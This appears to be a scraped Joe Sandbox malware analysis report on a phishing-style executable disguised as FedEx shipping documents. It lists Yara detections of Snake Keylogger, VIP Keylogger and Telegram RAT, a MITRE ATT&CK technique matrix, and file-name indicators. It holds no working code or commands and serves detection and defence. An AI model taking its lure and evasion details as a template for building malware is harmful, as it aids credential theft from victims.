Source: Yara match	File source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3930369501.0000000026D03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3934166321.000000002B943000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3930482210.000000002A793000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0000000E.00000002.3931012039.000000002A8C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3928012467.0000000029711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3928176067.0000000025C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.294202f6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.287d0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2d540000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a601216.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2c440000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d1216.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0f20.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.hzwdvhxM.pif.28abccf0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.287d0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a601216.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a6002f6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.hzwdvhxM.pif.28abccf0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.hzwdvhxM.pif.2792f7f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.hzwdvhxM.pif.23e4cb50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.29421216.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.hzwdvhxM.pif.23e4cb50.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2a6002f6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.25c20f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d02f6.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2d540000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.hzwdvhxM.pif.259d02f6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0f20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.294202f6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0f20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.hzwdvhxM.pif.2cee0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3931012039.000000002A9A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3932320588.00000000287D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3928176067.0000000025D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3928012467.00000000297DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 Valid Accounts	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	31 Obfuscated Files or Information	Security Account Manager	26 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	312 Process Injection	3 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	341 Security Software Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	231 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Valid Accounts	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	51 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	312 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1500660280.0000000021570000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020C3D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020C3D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435849334.000000007EE56000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435849334.000000007EE56000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020B60000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435508711.000000007EE1F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1459096681.0000000000786000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1501884350.0000000021889000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1501884350.0000000021889000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.000000000077D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435295037.000000007EE86000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435849334.000000007EE10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1500822415.0000000021686000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.000000000074E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe